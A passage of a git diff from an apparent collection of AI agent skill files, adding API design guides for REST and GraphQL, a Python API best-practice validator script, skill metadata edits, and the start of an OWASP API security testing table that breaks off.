||||
items=users,
|
||||
total=total,
|
||||
page=page,
|
||||
page_size=page_size,
|
||||
pages=(total + page_size - 1) // page_size
|
||||
)
|
||||
```
|
||||
|
||||
### Pattern 3: Error Handling and Status Codes
|
||||
|
||||
```python
|
||||
from fastapi import HTTPException, status
|
||||
from pydantic import BaseModel
|
||||
|
||||
class ErrorResponse(BaseModel):
|
||||
error: str
|
||||
message: str
|
||||
details: Optional[dict] = None
|
||||
timestamp: str
|
||||
path: str
|
||||
|
||||
class ValidationErrorDetail(BaseModel):
|
||||
field: str
|
||||
message: str
|
||||
value: Any
|
||||
|
||||
# Consistent error responses
|
||||
STATUS_CODES = {
|
||||
"success": 200,
|
||||
"created": 201,
|
||||
"no_content": 204,
|
||||
"bad_request": 400,
|
||||
"unauthorized": 401,
|
||||
"forbidden": 403,
|
||||
"not_found": 404,
|
||||
"conflict": 409,
|
||||
"unprocessable": 422,
|
||||
"internal_error": 500
|
||||
}
|
||||
|
||||
def raise_not_found(resource: str, id: str):
|
||||
raise HTTPException(
|
||||
status_code=status.HTTP_404_NOT_FOUND,
|
||||
detail={
|
||||
"error": "NotFound",
|
||||
"message": f"{resource} not found",
|
||||
"details": {"id": id}
|
||||
}
|
||||
)
|
||||
|
||||
def raise_validation_error(errors: List[ValidationErrorDetail]):
|
||||
raise HTTPException(
|
||||
status_code=status.HTTP_422_UNPROCESSABLE_ENTITY,
|
||||
detail={
|
||||
"error": "ValidationError",
|
||||
"message": "Request validation failed",
|
||||
"details": {"errors": [e.dict() for e in errors]}
|
||||
}
|
||||
)
|
||||
|
||||
# Example usage
|
||||
@app.get("/api/users/{user_id}")
|
||||
async def get_user(user_id: str):
|
||||
user = await fetch_user(user_id)
|
||||
if not user:
|
||||
raise_not_found("User", user_id)
|
||||
return user
|
||||
```
|
||||
|
||||
### Pattern 4: HATEOAS (Hypermedia as the Engine of Application State)
|
||||
|
||||
```python
|
||||
class UserResponse(BaseModel):
|
||||
id: str
|
||||
name: str
|
||||
email: str
|
||||
_links: dict
|
||||
|
||||
@classmethod
|
||||
def from_user(cls, user: User, base_url: str):
|
||||
return cls(
|
||||
id=user.id,
|
||||
name=user.name,
|
||||
email=user.email,
|
||||
_links={
|
||||
"self": {"href": f"{base_url}/api/users/{user.id}"},
|
||||
"orders": {"href": f"{base_url}/api/users/{user.id}/orders"},
|
||||
"update": {
|
||||
"href": f"{base_url}/api/users/{user.id}",
|
||||
"method": "PATCH"
|
||||
},
|
||||
"delete": {
|
||||
"href": f"{base_url}/api/users/{user.id}",
|
||||
"method": "DELETE"
|
||||
}
|
||||
}
|
||||
)
|
||||
```
|
||||
|
||||
## GraphQL Design Patterns
|
||||
|
||||
### Pattern 1: Schema Design
|
||||
|
||||
```graphql
|
||||
# schema.graphql
|
||||
|
||||
# Clear type definitions
|
||||
type User {
|
||||
id: ID!
|
||||
email: String!
|
||||
name: String!
|
||||
createdAt: DateTime!
|
||||
|
||||
# Relationships
|
||||
orders(first: Int = 20, after: String, status: OrderStatus): OrderConnection!
|
||||
|
||||
profile: UserProfile
|
||||
}
|
||||
|
||||
type Order {
|
||||
id: ID!
|
||||
status: OrderStatus!
|
||||
total: Money!
|
||||
items: [OrderItem!]!
|
||||
createdAt: DateTime!
|
||||
|
||||
# Back-reference
|
||||
user: User!
|
||||
}
|
||||
|
||||
# Pagination pattern (Relay-style)
|
||||
type OrderConnection {
|
||||
edges: [OrderEdge!]!
|
||||
pageInfo: PageInfo!
|
||||
totalCount: Int!
|
||||
}
|
||||
|
||||
type OrderEdge {
|
||||
node: Order!
|
||||
cursor: String!
|
||||
}
|
||||
|
||||
type PageInfo {
|
||||
hasNextPage: Boolean!
|
||||
hasPreviousPage: Boolean!
|
||||
startCursor: String
|
||||
endCursor: String
|
||||
}
|
||||
|
||||
# Enums for type safety
|
||||
enum OrderStatus {
|
||||
PENDING
|
||||
CONFIRMED
|
||||
SHIPPED
|
||||
DELIVERED
|
||||
CANCELLED
|
||||
}
|
||||
|
||||
# Custom scalars
|
||||
scalar DateTime
|
||||
scalar Money
|
||||
|
||||
# Query root
|
||||
type Query {
|
||||
user(id: ID!): User
|
||||
users(first: Int = 20, after: String, search: String): UserConnection!
|
||||
|
||||
order(id: ID!): Order
|
||||
}
|
||||
|
||||
# Mutation root
|
||||
type Mutation {
|
||||
createUser(input: CreateUserInput!): CreateUserPayload!
|
||||
updateUser(input: UpdateUserInput!): UpdateUserPayload!
|
||||
deleteUser(id: ID!): DeleteUserPayload!
|
||||
|
||||
createOrder(input: CreateOrderInput!): CreateOrderPayload!
|
||||
}
|
||||
|
||||
# Input types for mutations
|
||||
input CreateUserInput {
|
||||
email: String!
|
||||
name: String!
|
||||
password: String!
|
||||
}
|
||||
|
||||
# Payload types for mutations
|
||||
type CreateUserPayload {
|
||||
user: User
|
||||
errors: [Error!]
|
||||
}
|
||||
|
||||
type Error {
|
||||
field: String
|
||||
message: String!
|
||||
}
|
||||
```
|
||||
|
||||
### Pattern 2: Resolver Design
|
||||
|
||||
```python
|
||||
from typing import Optional, List
|
||||
from ariadne import QueryType, MutationType, ObjectType
|
||||
from dataclasses import dataclass
|
||||
|
||||
query = QueryType()
|
||||
mutation = MutationType()
|
||||
user_type = ObjectType("User")
|
||||
|
||||
@query.field("user")
|
||||
async def resolve_user(obj, info, id: str) -> Optional[dict]:
|
||||
"""Resolve single user by ID."""
|
||||
return await fetch_user_by_id(id)
|
||||
|
||||
@query.field("users")
|
||||
async def resolve_users(
|
||||
obj,
|
||||
info,
|
||||
first: int = 20,
|
||||
after: Optional[str] = None,
|
||||
search: Optional[str] = None
|
||||
) -> dict:
|
||||
"""Resolve paginated user list."""
|
||||
# Decode cursor
|
||||
offset = decode_cursor(after) if after else 0
|
||||
|
||||
# Fetch users
|
||||
users = await fetch_users(
|
||||
limit=first + 1, # Fetch one extra to check hasNextPage
|
||||
offset=offset,
|
||||
search=search
|
||||
)
|
||||
|
||||
# Pagination
|
||||
has_next = len(users) > first
|
||||
if has_next:
|
||||
users = users[:first]
|
||||
|
||||
edges = [
|
||||
{
|
||||
"node": user,
|
||||
"cursor": encode_cursor(offset + i)
|
||||
}
|
||||
for i, user in enumerate(users)
|
||||
]
|
||||
|
||||
return {
|
||||
"edges": edges,
|
||||
"pageInfo": {
|
||||
"hasNextPage": has_next,
|
||||
"hasPreviousPage": offset > 0,
|
||||
"startCursor": edges[0]["cursor"] if edges else None,
|
||||
"endCursor": edges[-1]["cursor"] if edges else None
|
||||
},
|
||||
"totalCount": await count_users(search=search)
|
||||
}
|
||||
|
||||
@user_type.field("orders")
|
||||
async def resolve_user_orders(user: dict, info, first: int = 20) -> dict:
|
||||
"""Resolve user's orders (N+1 prevention with DataLoader)."""
|
||||
# Use DataLoader to batch requests
|
||||
loader = info.context["loaders"]["orders_by_user"]
|
||||
orders = await loader.load(user["id"])
|
||||
|
||||
return paginate_orders(orders, first)
|
||||
|
||||
@mutation.field("createUser")
|
||||
async def resolve_create_user(obj, info, input: dict) -> dict:
|
||||
"""Create new user."""
|
||||
try:
|
||||
# Validate input
|
||||
validate_user_input(input)
|
||||
|
||||
# Create user
|
||||
user = await create_user(
|
||||
email=input["email"],
|
||||
name=input["name"],
|
||||
password=hash_password(input["password"])
|
||||
)
|
||||
|
||||
return {
|
||||
"user": user,
|
||||
"errors": []
|
||||
}
|
||||
except ValidationError as e:
|
||||
return {
|
||||
"user": None,
|
||||
"errors": [{"field": e.field, "message": e.message}]
|
||||
}
|
||||
```
|
||||
|
||||
### Pattern 3: DataLoader (N+1 Problem Prevention)
|
||||
|
||||
```python
|
||||
from aiodataloader import DataLoader
|
||||
from typing import List, Optional
|
||||
|
||||
class UserLoader(DataLoader):
|
||||
"""Batch load users by ID."""
|
||||
|
||||
async def batch_load_fn(self, user_ids: List[str]) -> List[Optional[dict]]:
|
||||
"""Load multiple users in single query."""
|
||||
users = await fetch_users_by_ids(user_ids)
|
||||
|
||||
# Map results back to input order
|
||||
user_map = {user["id"]: user for user in users}
|
||||
return [user_map.get(user_id) for user_id in user_ids]
|
||||
|
||||
class OrdersByUserLoader(DataLoader):
|
||||
"""Batch load orders by user ID."""
|
||||
|
||||
async def batch_load_fn(self, user_ids: List[str]) -> List[List[dict]]:
|
||||
"""Load orders for multiple users in single query."""
|
||||
orders = await fetch_orders_by_user_ids(user_ids)
|
||||
|
||||
# Group orders by user_id
|
||||
orders_by_user = {}
|
||||
for order in orders:
|
||||
user_id = order["user_id"]
|
||||
if user_id not in orders_by_user:
|
||||
orders_by_user[user_id] = []
|
||||
orders_by_user[user_id].append(order)
|
||||
|
||||
# Return in input order
|
||||
return [orders_by_user.get(user_id, []) for user_id in user_ids]
|
||||
|
||||
# Context setup
|
||||
def create_context():
|
||||
return {
|
||||
"loaders": {
|
||||
"user": UserLoader(),
|
||||
"orders_by_user": OrdersByUserLoader()
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
### REST APIs
|
||||
|
||||
1. **Consistent Naming**: Use plural nouns for collections (`/users`, not `/user`)
|
||||
2. **Stateless**: Each request contains all necessary information
|
||||
3. **Use HTTP Status Codes Correctly**: 2xx success, 4xx client errors, 5xx server errors
|
||||
4. **Version Your API**: Plan for breaking changes from day one
|
||||
5. **Pagination**: Always paginate large collections
|
||||
6. **Rate Limiting**: Protect your API with rate limits
|
||||
7. **Documentation**: Use OpenAPI/Swagger for interactive docs
|
||||
|
||||
### GraphQL APIs
|
||||
|
||||
1. **Schema First**: Design schema before writing resolvers
|
||||
2. **Avoid N+1**: Use DataLoaders for efficient data fetching
|
||||
3. **Input Validation**: Validate at schema and resolver levels
|
||||
4. **Error Handling**: Return structured errors in mutation payloads
|
||||
5. **Pagination**: Use cursor-based pagination (Relay spec)
|
||||
6. **Deprecation**: Use `@deprecated` directive for gradual migration
|
||||
7. **Monitoring**: Track query complexity and execution time
|
||||
|
||||
## Common Pitfalls
|
||||
|
||||
- **Over-fetching/Under-fetching (REST)**: Fixed in GraphQL but requires DataLoaders
|
||||
- **Breaking Changes**: Version APIs or use deprecation strategies
|
||||
- **Inconsistent Error Formats**: Standardize error responses
|
||||
- **Missing Rate Limits**: APIs without limits are vulnerable to abuse
|
||||
- **Poor Documentation**: Undocumented APIs frustrate developers
|
||||
- **Ignoring HTTP Semantics**: POST for idempotent operations breaks expectations
|
||||
- **Tight Coupling**: API structure shouldn't mirror database schema
|
||||
|
||||
## Resources
|
||||
|
||||
- **references/rest-best-practices.md**: Comprehensive REST API design guide
|
||||
- **references/graphql-schema-design.md**: GraphQL schema patterns and anti-patterns
|
||||
- **references/api-versioning-strategies.md**: Versioning approaches and migration paths
|
||||
- **assets/rest-api-template.py**: FastAPI REST API template
|
||||
- **assets/graphql-schema-template.graphql**: Complete GraphQL schema example
|
||||
- **assets/api-design-checklist.md**: Pre-implementation review checklist
|
||||
- **scripts/openapi-generator.py**: Generate OpenAPI specs from code
|
||||
@@ -3,6 +3,7 @@ name: api-documentation-generator
|
||||
description: "Generate comprehensive, developer-friendly API documentation from code, including endpoints, parameters, examples, and best practices"
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# API Documentation Generator
|
||||
|
||||
@@ -1,11 +1,10 @@
|
||||
---
|
||||
name: api-documentation
|
||||
description: "API documentation workflow for generating OpenAPI specs, creating developer guides, and maintaining comprehensive API documentation."
|
||||
source: personal
|
||||
risk: safe
|
||||
domain: documentation
|
||||
category: granular-workflow-bundle
|
||||
version: 1.0.0
|
||||
risk: safe
|
||||
source: personal
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# API Documentation Workflow
|
||||
|
||||
@@ -1,14 +1,9 @@
|
||||
---
|
||||
name: api-documenter
|
||||
description: |
|
||||
Master API documentation with OpenAPI 3.1, AI-powered tools, and
|
||||
modern developer experience practices. Create interactive docs, generate SDKs,
|
||||
and build comprehensive developer portals. Use PROACTIVELY for API
|
||||
documentation or developer portal creation.
|
||||
metadata:
|
||||
model: sonnet
|
||||
description: Master API documentation with OpenAPI 3.1, AI-powered tools, and modern developer experience practices. Create interactive docs, generate SDKs, and build comprehensive developer portals.
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: '2026-02-27'
|
||||
---
|
||||
You are an expert API documentation specialist mastering modern developer experience through comprehensive, interactive, and AI-enhanced documentation.
|
||||
|
||||
|
||||
@@ -1,11 +1,9 @@
|
||||
---
|
||||
name: api-fuzzing-bug-bounty
|
||||
description: "This skill should be used when the user asks to \"test API security\", \"fuzz APIs\", \"find IDOR vulnerabilities\", \"test REST API\", \"test GraphQL\", \"API penetration testing\", \"bug b..."
|
||||
metadata:
|
||||
author: zebbern
|
||||
version: "1.1"
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# API Fuzzing for Bug Bounty
|
||||
|
||||
@@ -1,9 +1,9 @@
|
||||
---
|
||||
name: api-patterns
|
||||
description: "API design principles and decision-making. REST vs GraphQL vs tRPC selection, response formats, versioning, pagination."
|
||||
allowed-tools: Read, Write, Edit, Glob, Grep
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# API Patterns
|
||||
|
||||
42
web-app/public/skills/api-patterns/api-style.md
Normal file
42
web-app/public/skills/api-patterns/api-style.md
Normal file
@@ -0,0 +1,42 @@
|
||||
# API Style Selection (2025)
|
||||
|
||||
> REST vs GraphQL vs tRPC - Hangi durumda hangisi?
|
||||
|
||||
## Decision Tree
|
||||
|
||||
```
|
||||
Who are the API consumers?
|
||||
│
|
||||
├── Public API / Multiple platforms
|
||||
│ └── REST + OpenAPI (widest compatibility)
|
||||
│
|
||||
├── Complex data needs / Multiple frontends
|
||||
│ └── GraphQL (flexible queries)
|
||||
│
|
||||
├── TypeScript frontend + backend (monorepo)
|
||||
│ └── tRPC (end-to-end type safety)
|
||||
│
|
||||
├── Real-time / Event-driven
|
||||
│ └── WebSocket + AsyncAPI
|
||||
│
|
||||
└── Internal microservices
|
||||
└── gRPC (performance) or REST (simplicity)
|
||||
```
|
||||
|
||||
## Comparison
|
||||
|
||||
| Factor | REST | GraphQL | tRPC |
|
||||
|--------|------|---------|------|
|
||||
| **Best for** | Public APIs | Complex apps | TS monorepos |
|
||||
| **Learning curve** | Low | Medium | Low (if TS) |
|
||||
| **Over/under fetching** | Common | Solved | Solved |
|
||||
| **Type safety** | Manual (OpenAPI) | Schema-based | Automatic |
|
||||
| **Caching** | HTTP native | Complex | Client-based |
|
||||
|
||||
## Selection Questions
|
||||
|
||||
1. Who are the API consumers?
|
||||
2. Is the frontend TypeScript?
|
||||
3. How complex are the data relationships?
|
||||
4. Is caching critical?
|
||||
5. Public or internal API?
|
||||
24
web-app/public/skills/api-patterns/auth.md
Normal file
24
web-app/public/skills/api-patterns/auth.md
Normal file
@@ -0,0 +1,24 @@
|
||||
# Authentication Patterns
|
||||
|
||||
> Choose auth pattern based on use case.
|
||||
|
||||
## Selection Guide
|
||||
|
||||
| Pattern | Best For |
|
||||
|---------|----------|
|
||||
| **JWT** | Stateless, microservices |
|
||||
| **Session** | Traditional web, simple |
|
||||
| **OAuth 2.0** | Third-party integration |
|
||||
| **API Keys** | Server-to-server, public APIs |
|
||||
| **Passkey** | Modern passwordless (2025+) |
|
||||
|
||||
## JWT Principles
|
||||
|
||||
```
|
||||
Important:
|
||||
├── Always verify signature
|
||||
├── Check expiration
|
||||
├── Include minimal claims
|
||||
├── Use short expiry + refresh tokens
|
||||
└── Never store sensitive data in JWT
|
||||
```
|
||||
26
web-app/public/skills/api-patterns/documentation.md
Normal file
26
web-app/public/skills/api-patterns/documentation.md
Normal file
@@ -0,0 +1,26 @@
|
||||
# API Documentation Principles
|
||||
|
||||
> Good docs = happy developers = API adoption.
|
||||
|
||||
## OpenAPI/Swagger Essentials
|
||||
|
||||
```
|
||||
Include:
|
||||
├── All endpoints with examples
|
||||
├── Request/response schemas
|
||||
├── Authentication requirements
|
||||
├── Error response formats
|
||||
└── Rate limiting info
|
||||
```
|
||||
|
||||
## Good Documentation Has
|
||||
|
||||
```
|
||||
Essentials:
|
||||
├── Quick start / Getting started
|
||||
├── Authentication guide
|
||||
├── Complete API reference
|
||||
├── Error handling guide
|
||||
├── Code examples (multiple languages)
|
||||
└── Changelog
|
||||
```
|
||||
41
web-app/public/skills/api-patterns/graphql.md
Normal file
41
web-app/public/skills/api-patterns/graphql.md
Normal file
@@ -0,0 +1,41 @@
|
||||
# GraphQL Principles
|
||||
|
||||
> Flexible queries for complex, interconnected data.
|
||||
|
||||
## When to Use
|
||||
|
||||
```
|
||||
✅ Good fit:
|
||||
├── Complex, interconnected data
|
||||
├── Multiple frontend platforms
|
||||
├── Clients need flexible queries
|
||||
├── Evolving data requirements
|
||||
└── Reducing over-fetching matters
|
||||
|
||||
❌ Poor fit:
|
||||
├── Simple CRUD operations
|
||||
├── File upload heavy
|
||||
├── HTTP caching important
|
||||
└── Team unfamiliar with GraphQL
|
||||
```
|
||||
|
||||
## Schema Design Principles
|
||||
|
||||
```
|
||||
Principles:
|
||||
├── Think in graphs, not endpoints
|
||||
├── Design for evolvability (no versions)
|
||||
├── Use connections for pagination
|
||||
├── Be specific with types (not generic "data")
|
||||
└── Handle nullability thoughtfully
|
||||
```
|
||||
|
||||
## Security Considerations
|
||||
|
||||
```
|
||||
Protect against:
|
||||
├── Query depth attacks → Set max depth
|
||||
├── Query complexity → Calculate cost
|
||||
├── Batching abuse → Limit batch size
|
||||
├── Introspection → Disable in production
|
||||
```
|
||||
31
web-app/public/skills/api-patterns/rate-limiting.md
Normal file
31
web-app/public/skills/api-patterns/rate-limiting.md
Normal file
@@ -0,0 +1,31 @@
|
||||
# Rate Limiting Principles
|
||||
|
||||
> Protect your API from abuse and overload.
|
||||
|
||||
## Why Rate Limit
|
||||
|
||||
```
|
||||
Protect against:
|
||||
├── Brute force attacks
|
||||
├── Resource exhaustion
|
||||
├── Cost overruns (if pay-per-use)
|
||||
└── Unfair usage
|
||||
```
|
||||
|
||||
## Strategy Selection
|
||||
|
||||
| Type | How | When |
|
||||
|------|-----|------|
|
||||
| **Token bucket** | Burst allowed, refills over time | Most APIs |
|
||||
| **Sliding window** | Smooth distribution | Strict limits |
|
||||
| **Fixed window** | Simple counters per window | Basic needs |
|
||||
|
||||
## Response Headers
|
||||
|
||||
```
|
||||
Include in headers:
|
||||
├── X-RateLimit-Limit (max requests)
|
||||
├── X-RateLimit-Remaining (requests left)
|
||||
├── X-RateLimit-Reset (when limit resets)
|
||||
└── Return 429 when exceeded
|
||||
```
|
||||
37
web-app/public/skills/api-patterns/response.md
Normal file
37
web-app/public/skills/api-patterns/response.md
Normal file
@@ -0,0 +1,37 @@
|
||||
# Response Format Principles
|
||||
|
||||
> Consistency is key - choose a format and stick to it.
|
||||
|
||||
## Common Patterns
|
||||
|
||||
```
|
||||
Choose one:
|
||||
├── Envelope pattern ({ success, data, error })
|
||||
├── Direct data (just return the resource)
|
||||
└── HAL/JSON:API (hypermedia)
|
||||
```
|
||||
|
||||
## Error Response
|
||||
|
||||
```
|
||||
Include:
|
||||
├── Error code (for programmatic handling)
|
||||
├── User message (for display)
|
||||
├── Details (for debugging, field-level errors)
|
||||
├── Request ID (for support)
|
||||
└── NOT internal details (security!)
|
||||
```
|
||||
|
||||
## Pagination Types
|
||||
|
||||
| Type | Best For | Trade-offs |
|
||||
|------|----------|------------|
|
||||
| **Offset** | Simple, jumpable | Performance on large datasets |
|
||||
| **Cursor** | Large datasets | Can't jump to page |
|
||||
| **Keyset** | Performance critical | Requires sortable key |
|
||||
|
||||
### Selection Questions
|
||||
|
||||
1. How large is the dataset?
|
||||
2. Do users need to jump to specific pages?
|
||||
3. Is data frequently changing?
|
||||
40
web-app/public/skills/api-patterns/rest.md
Normal file
40
web-app/public/skills/api-patterns/rest.md
Normal file
@@ -0,0 +1,40 @@
|
||||
# REST Principles
|
||||
|
||||
> Resource-based API design - nouns not verbs.
|
||||
|
||||
## Resource Naming Rules
|
||||
|
||||
```
|
||||
Principles:
|
||||
├── Use NOUNS, not verbs (resources, not actions)
|
||||
├── Use PLURAL forms (/users not /user)
|
||||
├── Use lowercase with hyphens (/user-profiles)
|
||||
├── Nest for relationships (/users/123/posts)
|
||||
└── Keep shallow (max 3 levels deep)
|
||||
```
|
||||
|
||||
## HTTP Method Selection
|
||||
|
||||
| Method | Purpose | Idempotent? | Body? |
|
||||
|--------|---------|-------------|-------|
|
||||
| **GET** | Read resource(s) | Yes | No |
|
||||
| **POST** | Create new resource | No | Yes |
|
||||
| **PUT** | Replace entire resource | Yes | Yes |
|
||||
| **PATCH** | Partial update | No | Yes |
|
||||
| **DELETE** | Remove resource | Yes | No |
|
||||
|
||||
## Status Code Selection
|
||||
|
||||
| Situation | Code | Why |
|
||||
|-----------|------|-----|
|
||||
| Success (read) | 200 | Standard success |
|
||||
| Created | 201 | New resource created |
|
||||
| No content | 204 | Success, nothing to return |
|
||||
| Bad request | 400 | Malformed request |
|
||||
| Unauthorized | 401 | Missing/invalid auth |
|
||||
| Forbidden | 403 | Valid auth, no permission |
|
||||
| Not found | 404 | Resource doesn't exist |
|
||||
| Conflict | 409 | State conflict (duplicate) |
|
||||
| Validation error | 422 | Valid syntax, invalid data |
|
||||
| Rate limited | 429 | Too many requests |
|
||||
| Server error | 500 | Our fault |
|
||||
211
web-app/public/skills/api-patterns/scripts/api_validator.py
Normal file
211
web-app/public/skills/api-patterns/scripts/api_validator.py
Normal file
@@ -0,0 +1,211 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
API Validator - Checks API endpoints for best practices.
|
||||
Validates OpenAPI specs, response formats, and common issues.
|
||||
"""
|
||||
import sys
|
||||
import json
|
||||
import re
|
||||
from pathlib import Path
|
||||
|
||||
# Fix Windows console encoding for Unicode output
|
||||
try:
|
||||
sys.stdout.reconfigure(encoding='utf-8', errors='replace')
|
||||
sys.stderr.reconfigure(encoding='utf-8', errors='replace')
|
||||
except AttributeError:
|
||||
pass # Python < 3.7
|
||||
|
||||
def find_api_files(project_path: Path) -> list:
|
||||
"""Find API-related files."""
|
||||
patterns = [
|
||||
"**/*api*.ts", "**/*api*.js", "**/*api*.py",
|
||||
"**/routes/*.ts", "**/routes/*.js", "**/routes/*.py",
|
||||
"**/controllers/*.ts", "**/controllers/*.js",
|
||||
"**/endpoints/*.ts", "**/endpoints/*.py",
|
||||
"**/*.openapi.json", "**/*.openapi.yaml",
|
||||
"**/swagger.json", "**/swagger.yaml",
|
||||
"**/openapi.json", "**/openapi.yaml"
|
||||
]
|
||||
|
||||
files = []
|
||||
for pattern in patterns:
|
||||
files.extend(project_path.glob(pattern))
|
||||
|
||||
# Exclude node_modules, etc.
|
||||
return [f for f in files if not any(x in str(f) for x in ['node_modules', '.git', 'dist', 'build', '__pycache__'])]
|
||||
|
||||
def check_openapi_spec(file_path: Path) -> dict:
|
||||
"""Check OpenAPI/Swagger specification."""
|
||||
issues = []
|
||||
passed = []
|
||||
|
||||
try:
|
||||
content = file_path.read_text(encoding='utf-8')
|
||||
|
||||
if file_path.suffix == '.json':
|
||||
spec = json.loads(content)
|
||||
else:
|
||||
# Basic YAML check
|
||||
if 'openapi:' in content or 'swagger:' in content:
|
||||
passed.append("[OK] OpenAPI/Swagger version defined")
|
||||
else:
|
||||
issues.append("[X] No OpenAPI version found")
|
||||
|
||||
if 'paths:' in content:
|
||||
passed.append("[OK] Paths section exists")
|
||||
else:
|
||||
issues.append("[X] No paths defined")
|
||||
|
||||
if 'components:' in content or 'definitions:' in content:
|
||||
passed.append("[OK] Schema components defined")
|
||||
|
||||
return {'file': str(file_path), 'passed': passed, 'issues': issues, 'type': 'openapi'}
|
||||
|
||||
# JSON OpenAPI checks
|
||||
if 'openapi' in spec or 'swagger' in spec:
|
||||
passed.append("[OK] OpenAPI version defined")
|
||||
|
||||
if 'info' in spec:
|
||||
if 'title' in spec['info']:
|
||||
passed.append("[OK] API title defined")
|
||||
if 'version' in spec['info']:
|
||||
passed.append("[OK] API version defined")
|
||||
if 'description' not in spec['info']:
|
||||
issues.append("[!] API description missing")
|
||||
|
||||
if 'paths' in spec:
|
||||
path_count = len(spec['paths'])
|
||||
passed.append(f"[OK] {path_count} endpoints defined")
|
||||
|
||||
# Check each path
|
||||
for path, methods in spec['paths'].items():
|
||||
for method, details in methods.items():
|
||||
if method in ['get', 'post', 'put', 'patch', 'delete']:
|
||||
if 'responses' not in details:
|
||||
issues.append(f"[X] {method.upper()} {path}: No responses defined")
|
||||
if 'summary' not in details and 'description' not in details:
|
||||
issues.append(f"[!] {method.upper()} {path}: No description")
|
||||
|
||||
except Exception as e:
|
||||
issues.append(f"[X] Parse error: {e}")
|
||||
|
||||
return {'file': str(file_path), 'passed': passed, 'issues': issues, 'type': 'openapi'}
|
||||
|
||||
def check_api_code(file_path: Path) -> dict:
|
||||
"""Check API code for common issues."""
|
||||
issues = []
|
||||
passed = []
|
||||
|
||||
try:
|
||||
content = file_path.read_text(encoding='utf-8')
|
||||
|
||||
# Check for error handling
|
||||
error_patterns = [
|
||||
r'try\s*{', r'try:', r'\.catch\(',
|
||||
r'except\s+', r'catch\s*\('
|
||||
]
|
||||
has_error_handling = any(re.search(p, content) for p in error_patterns)
|
||||
if has_error_handling:
|
||||
passed.append("[OK] Error handling present")
|
||||
else:
|
||||
issues.append("[X] No error handling found")
|
||||
|
||||
# Check for status codes
|
||||
status_patterns = [
|
||||
r'status\s*\(\s*\d{3}\s*\)', r'statusCode\s*[=:]\s*\d{3}',
|
||||
r'HttpStatus\.', r'status_code\s*=\s*\d{3}',
|
||||
r'\.status\(\d{3}\)', r'res\.status\('
|
||||
]
|
||||
has_status = any(re.search(p, content) for p in status_patterns)
|
||||
if has_status:
|
||||
passed.append("[OK] HTTP status codes used")
|
||||
else:
|
||||
issues.append("[!] No explicit HTTP status codes")
|
||||
|
||||
# Check for validation
|
||||
validation_patterns = [
|
||||
r'validate', r'schema', r'zod', r'joi', r'yup',
|
||||
r'pydantic', r'@Body\(', r'@Query\('
|
||||
]
|
||||
has_validation = any(re.search(p, content, re.I) for p in validation_patterns)
|
||||
if has_validation:
|
||||
passed.append("[OK] Input validation present")
|
||||
else:
|
||||
issues.append("[!] No input validation detected")
|
||||
|
||||
# Check for auth middleware
|
||||
auth_patterns = [
|
||||
r'auth', r'jwt', r'bearer', r'token',
|
||||
r'middleware', r'guard', r'@Authenticated'
|
||||
]
|
||||
has_auth = any(re.search(p, content, re.I) for p in auth_patterns)
|
||||
if has_auth:
|
||||
passed.append("[OK] Authentication/authorization detected")
|
||||
|
||||
# Check for rate limiting
|
||||
rate_patterns = [r'rateLimit', r'throttle', r'rate.?limit']
|
||||
has_rate = any(re.search(p, content, re.I) for p in rate_patterns)
|
||||
if has_rate:
|
||||
passed.append("[OK] Rate limiting present")
|
||||
|
||||
# Check for logging
|
||||
log_patterns = [r'console\.log', r'logger\.', r'logging\.', r'log\.']
|
||||
has_logging = any(re.search(p, content) for p in log_patterns)
|
||||
if has_logging:
|
||||
passed.append("[OK] Logging present")
|
||||
|
||||
except Exception as e:
|
||||
issues.append(f"[X] Read error: {e}")
|
||||
|
||||
return {'file': str(file_path), 'passed': passed, 'issues': issues, 'type': 'code'}
|
||||
|
||||
def main():
|
||||
target = sys.argv[1] if len(sys.argv) > 1 else "."
|
||||
project_path = Path(target)
|
||||
|
||||
print("\n" + "=" * 60)
|
||||
print(" API VALIDATOR - Endpoint Best Practices Check")
|
||||
print("=" * 60 + "\n")
|
||||
|
||||
api_files = find_api_files(project_path)
|
||||
|
||||
if not api_files:
|
||||
print("[!] No API files found.")
|
||||
print(" Looking for: routes/, controllers/, api/, openapi.json/yaml")
|
||||
sys.exit(0)
|
||||
|
||||
results = []
|
||||
for file_path in api_files[:15]: # Limit
|
||||
if 'openapi' in file_path.name.lower() or 'swagger' in file_path.name.lower():
|
||||
result = check_openapi_spec(file_path)
|
||||
else:
|
||||
result = check_api_code(file_path)
|
||||
results.append(result)
|
||||
|
||||
# Print results
|
||||
total_issues = 0
|
||||
total_passed = 0
|
||||
|
||||
for result in results:
|
||||
print(f"\n[FILE] {result['file']} [{result['type']}]")
|
||||
for item in result['passed']:
|
||||
print(f" {item}")
|
||||
total_passed += 1
|
||||
for item in result['issues']:
|
||||
print(f" {item}")
|
||||
if item.startswith("[X]"):
|
||||
total_issues += 1
|
||||
|
||||
print("\n" + "=" * 60)
|
||||
print(f"[RESULTS] {total_passed} passed, {total_issues} critical issues")
|
||||
print("=" * 60)
|
||||
|
||||
if total_issues == 0:
|
||||
print("[OK] API validation passed")
|
||||
sys.exit(0)
|
||||
else:
|
||||
print("[X] Fix critical issues before deployment")
|
||||
sys.exit(1)
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
122
web-app/public/skills/api-patterns/security-testing.md
Normal file
122
web-app/public/skills/api-patterns/security-testing.md
Normal file
@@ -0,0 +1,122 @@
|
||||
# API Security Testing
|
||||
|
||||
> Principles for testing API security. OWASP API Top 10, authentication, authorization testing.
|
||||
|
||||
---
|
||||
|
||||
## OWASP API Security Top 10
|
||||
|
||||
| Vulnerability | Test Focus |
|
||||
|---------------|------------|
|
||||
| **API1: BOLA** | Access other users' resources |
|
||||
| **API2: Broken Auth** | JWT, session, credentials |
|
||||
| **API3: Property Auth** | Mass assignment, data exposure |
|
||||
| **API4: Resource Consumption** | Rate limiting, DoS |
|
||||
| **API5: Function Auth** | Admin endpoints, role bypass |
|
||||
| **API6: Business Flow** | Logic abuse, automation |
|
||||
| **API7: SSRF** | Internal network access |
|
||||
